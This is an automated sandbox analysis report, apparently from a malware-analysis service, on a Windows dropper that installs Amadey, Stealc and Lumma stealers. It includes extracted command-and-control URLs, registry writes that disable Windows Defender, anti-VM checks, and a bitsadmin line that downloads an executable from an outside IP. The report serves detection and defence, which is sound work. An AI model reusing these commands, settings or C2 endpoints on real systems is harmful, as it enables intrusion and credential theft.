Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 21:02
Static task
static1
General
-
Target
f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe
-
Size
7.1MB
-
MD5
2cd13c7beaf13788651564bcce8e7080
-
SHA1
752832331e65afbe43a5aa718aec239104fdd4cd
-
SHA256
f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24a
-
SHA512
0738d5dfc56a52a8d82efd00b8e36143bea02b2072f4b09d4389ada0372dba6c9b5c2e627377faef09dc5baeba5f34c577f4a6aa4ae60d9871e946749392086c
-
SSDEEP
196608:x8cVdeT8BCfJLyXh6lywed3tO4J2ALop39SQ+uZ0ZMAQj+x:x8lTT6rltODcopvXC8+
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4F842a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4F842a.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4F842a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4F842a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4F842a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4F842a.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2h0715.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3E10n.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4F842a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b33dcfc574.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1v97l6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3364 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1v97l6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2h0715.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2h0715.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4F842a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4F842a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b33dcfc574.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1v97l6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3E10n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b33dcfc574.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3E10n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 1v97l6.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe -
Executes dropped EXE 14 IoCs
pid Process 3464 u9Z12.exe 2064 F6C75.exe 1256 1v97l6.exe 2804 skotes.exe 3588 2h0715.exe 4292 3E10n.exe 3932 4F842a.exe 776 stories.exe 4560 stories.tmp 3996 videojet3264.exe 980 skotes.exe 4680 skotes.exe 760 0DMNix3.exe 3228 b33dcfc574.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 1v97l6.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 2h0715.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 3E10n.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 4F842a.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine b33dcfc574.exe -
Loads dropped DLL 4 IoCs
pid Process 4560 stories.tmp 3996 videojet3264.exe 760 0DMNix3.exe 760 0DMNix3.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4F842a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4F842a.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" u9Z12.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" F6C75.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1256 1v97l6.exe 2804 skotes.exe 3588 2h0715.exe 4292 3E10n.exe 3932 4F842a.exe 980 skotes.exe 4680 skotes.exe 3228 b33dcfc574.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1v97l6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1592 3588 WerFault.exe 86 1064 3588 WerFault.exe 86 1712 4084 WerFault.exe 104 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language videojet3264.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2h0715.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1v97l6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3E10n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0DMNix3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u9Z12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language F6C75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4F842a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b33dcfc574.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4328 ping.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4328 ping.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1256 1v97l6.exe 1256 1v97l6.exe 2804 skotes.exe 2804 skotes.exe 3588 2h0715.exe 3588 2h0715.exe 4292 3E10n.exe 4292 3E10n.exe 3932 4F842a.exe 3932 4F842a.exe 4560 stories.tmp 4560 stories.tmp 3932 4F842a.exe 3932 4F842a.exe 980 skotes.exe 980 skotes.exe 4680 skotes.exe 4680 skotes.exe 3228 b33dcfc574.exe 3228 b33dcfc574.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3932 4F842a.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1256 1v97l6.exe 4560 stories.tmp -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 556 wrote to memory of 3464 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 82 PID 556 wrote to memory of 3464 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 82 PID 556 wrote to memory of 3464 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 82 PID 3464 wrote to memory of 2064 3464 u9Z12.exe 83 PID 3464 wrote to memory of 2064 3464 u9Z12.exe 83 PID 3464 wrote to memory of 2064 3464 u9Z12.exe 83 PID 2064 wrote to memory of 1256 2064 F6C75.exe 84 PID 2064 wrote to memory of 1256 2064 F6C75.exe 84 PID 2064 wrote to memory of 1256 2064 F6C75.exe 84 PID 1256 wrote to memory of 2804 1256 1v97l6.exe 85 PID 1256 wrote to memory of 2804 1256 1v97l6.exe 85 PID 1256 wrote to memory of 2804 1256 1v97l6.exe 85 PID 2064 wrote to memory of 3588 2064 F6C75.exe 86 PID 2064 wrote to memory of 3588 2064 F6C75.exe 86 PID 2064 wrote to memory of 3588 2064 F6C75.exe 86 PID 3464 wrote to memory of 4292 3464 u9Z12.exe 93 PID 3464 wrote to memory of 4292 3464 u9Z12.exe 93 PID 3464 wrote to memory of 4292 3464 u9Z12.exe 93 PID 556 wrote to memory of 3932 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 94 PID 556 wrote to memory of 3932 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 94 PID 556 wrote to memory of 3932 556 f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe 94 PID 2804 wrote to memory of 776 2804 skotes.exe 95 PID 2804 wrote to memory of 776 2804 skotes.exe 95 PID 2804 wrote to memory of 776 2804 skotes.exe 95 PID 776 wrote to memory of 4560 776 stories.exe 96 PID 776 wrote to memory of 4560 776 stories.exe 96 PID 776 wrote to memory of 4560 776 stories.exe 96 PID 4560 wrote to memory of 1752 4560 stories.tmp 99 PID 4560 wrote to memory of 1752 4560 stories.tmp 99 PID 4560 wrote to memory of 1752 4560 stories.tmp 99 PID 4560 wrote to memory of 3996 4560 stories.tmp 101 PID 4560 wrote to memory of 3996 4560 stories.tmp 101 PID 4560 wrote to memory of 3996 4560 stories.tmp 101 PID 1752 wrote to memory of 1116 1752 net.exe 102 PID 1752 wrote to memory of 1116 1752 net.exe 102 PID 1752 wrote to memory of 1116 1752 net.exe 102 PID 2804 wrote to memory of 4084 2804 skotes.exe 104 PID 2804 wrote to memory of 4084 2804 skotes.exe 104 PID 2804 wrote to memory of 4084 2804 skotes.exe 104 PID 2804 wrote to memory of 760 2804 skotes.exe 115 PID 2804 wrote to memory of 760 2804 skotes.exe 115 PID 2804 wrote to memory of 760 2804 skotes.exe 115 PID 760 wrote to memory of 4328 760 0DMNix3.exe 116 PID 760 wrote to memory of 4328 760 0DMNix3.exe 116 PID 760 wrote to memory of 4328 760 0DMNix3.exe 116 PID 760 wrote to memory of 3364 760 0DMNix3.exe 118 PID 760 wrote to memory of 3364 760 0DMNix3.exe 118 PID 760 wrote to memory of 3364 760 0DMNix3.exe 118 PID 2804 wrote to memory of 3228 2804 skotes.exe 121 PID 2804 wrote to memory of 3228 2804 skotes.exe 121 PID 2804 wrote to memory of 3228 2804 skotes.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe"C:\Users\Admin\AppData\Local\Temp\f29285d3513a9e41408bf768f63bc000466ca3e7365626d35acab3ce9d82b24aN.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u9Z12.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u9Z12.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\F6C75.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\F6C75.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1v97l6.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1v97l6.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Users\Admin\AppData\Local\Temp\is-F6DJ2.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-F6DJ2.tmp\stories.tmp" /SL5="$702B6,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause video_jet_12358⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause video_jet_12359⤵
- System Location Discovery: System Language Discovery
PID:1116
-
-
-
C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe"C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3996
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:4084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 6007⤵
- Program crash
PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.87⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4328
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3364
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011752001\b33dcfc574.exe"C:\Users\Admin\AppData\Local\Temp\1011752001\b33dcfc574.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2h0715.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2h0715.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 15605⤵
- Program crash
PID:1592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 17405⤵
- Program crash
PID:1064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3E10n.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3E10n.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4F842a.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4F842a.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3588 -ip 35881⤵PID:4116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3588 -ip 35881⤵PID:980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4084 -ip 40841⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:980
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4680
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
BITS Jobs
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.4MB
MD57ad720a71ec040facb3e4d4fede86a9e
SHA19cd9d5ac38a8747d12f1ee26db00388fe8908b05
SHA2562b928ea45d822911163856aac9ba7a1f524f5255da94e8ae34e23784c8e6450b
SHA512f6c52a3eafdfb509fc8f331a525e9550627e203dafe451a1148c118e4cc6167cc56b1ff9a1f720598e35192508935f6898bea65e9bf041c69ee84fb65892242f
-
Filesize
1.1MB
MD57766e0663a3c658152e1b956ae8f28d6
SHA10efb9aac1e0980d94e5f8559c064e7719636ec04
SHA256a56eaa4ac24a721f658e9b28e76588a2452d5b335261c18b9d4a2a3c026e7c21
SHA5126256313c0c609eca7e33c028097bce7c72a8288456c1c93a041cb3ca8a5369c46bf5866000d01800f4cc0306f51eb84333a721efc3cd47496969f27d9184ab47
-
Filesize
1.1MB
MD5bad75823a737847eeddc8ff78bf27b88
SHA17e6e0301f6528f9bad44609f53a0a83094e3ce19
SHA2569228adafbb11b5c9962e3361a472c272acff3e977cd79444f9ff470bee1f5ec5
SHA5128d7ee583f4f62892055a04d0cdb298fa0903c03b5a36059a28af922bec7a75b2eb4679ae01e4e60af12ec9e24b40c6af0dd1fa30321f97a4867f8e9f9b32bd5f
-
Filesize
42KB
MD5dd587632bd83be28e06fc74be5ffe634
SHA19ffc068a93bcd0b880ab1113a1082a9823bfb16f
SHA25621236dee121b0f9fe9cf21093f857d092bb9c56b57b59c52d65ec204408c15a7
SHA512d93bd61d9dabe3fa53bd8e63a509c760dce09c8091d6236ac1370147b075fe2a5c48ee756ac09c4a3bb7923dc53d3f20d4a213cac0b24fe37efba29e09941882
-
Filesize
4.2MB
MD500829e9f170e0593b78455648bef936d
SHA1b3f33c860a7daf6dc51235930532e39f2031f009
SHA2565b7938dc4feb9b3ff8ecc707d77c9fcd5318fc63c092302a7773e4de344b7e08
SHA51251592e7871490ceeb4b0a71e7a3a43ece82988d7047768d80b20f6046d862e8514e3c161a3f3a3545f673422154aa2355aba684bc9e3e45d6d4c1e5ec7a2e6e6
-
Filesize
2.7MB
MD58ae897f5e66bd28f031b43ac4b58e322
SHA170d2fd9ee78145715da4a6d6fb5132b184a1ad28
SHA2568f27938095cae53183677c487e3b2930e3e8f4df3a95a3b43b1586cc15a7eb70
SHA51272daf56d09cbf924329d2ea0ebbb53347be3e7e84f77d2e6e3f959151a1a1d40b5eb45098d5bff73b432c22ad95bca0ae3b034ddb6ac19e062e38721388696d2
-
Filesize
5.5MB
MD5c981df2350d12a579384c328a2aa6a8a
SHA10e1588c293ef7c45b4be50324d1a87e7f6d26f58
SHA256488f2a37cea00135d2038e908c0735a359e31940152d616897e0d011567ed6ad
SHA5128a5cb4dfccca37c1db1a03820da399a49abdad5e4fe949477554e16100116f8e5e74b05e3c5a149e5fc48cd0f7f43b5d6d3eb7555a5d4c165e9e6ba7a9e749d1
-
Filesize
1.7MB
MD5393f5ee48f2ae353b9a4adcc51cb789f
SHA1f522e95e1d96015019e5af3de8da8cecbaee8f68
SHA25659c47a02f630bcdabbb284a05d486479e7e507d9510e246d2c4bc48ad49984bf
SHA512e19a4831ee81a4df5ff75c5000cdd6f2f30e0433afb6f008f45916e838030cad1867e4f55d5a15092fe51e87fb64263fe97fcb3c3f6eb0681ae7d8fcf4968aae
-
Filesize
3.7MB
MD5cab7ef0b2d1e9ebb5059d7f400674b92
SHA151922c0b904389728d43eb2ba9acc99dab90c7fe
SHA25665fac26a5369e8fdafdd18b29b3445f7640afd8efa91e1b4db4f4a102ccdde26
SHA512cf0a3c5246488e717c1f9d016a63f8b99a2671b033874c99667c87fd3d29f05f9c8de8bd2d7f604414633e28c4c151858a58f1dca01dc7bd403a45eb4b4baf27
-
Filesize
1.8MB
MD54a621d7648695348889cf9b0af6c97eb
SHA1428888c9ef81ec58bfc32036013520465c66a9b7
SHA2568310a7193b9e91be4355931fe56b6f47b98839621df007f1bd87dda98dff79ed
SHA512f8d4f403f7f6ac220c0653a4fa78eb363a7bf7c4f3aab3a70b1393bc183f94bff186549ef5fe8899deb954f325a8f1c31321d5af36f40b3b983b5999309e4784
-
Filesize
1.8MB
MD51762da739387a4d17fe8cc7145e35b88
SHA14b595b0b0f34485910adac82907fcac664ba35a6
SHA2566edffa2f937dec4542b31e8d544e3bdae845a046b7a7e33006b5fbc9ffef18de
SHA5125fd84b69b62044c9a1c389f075f6f823899bd85ea018b065880b6f8b7676a1c97fa9c4958dd476314cd77aa6f3d96a0becea466b003a3cc46db0296a536f2734
-
Filesize
689KB
MD560036d8f272457648671fec6fd8215f4
SHA13685338ef75edde50c8ab794bdcc73f70ba36bd3
SHA256e3384fe9466d2b9f88428a30d6068b496f405a826dd221160b9f307050cce2f1
SHA512711d4dd2d92d512fd9b19f44b9568afacc03a50842495a983398523cb6b0b3bcc6fe3e66deb2cc044924e40c96b7c7ada80540e72902b8438a4e8e073ea21358
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a
-
Filesize
630KB
MD5e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
Filesize
3.0MB
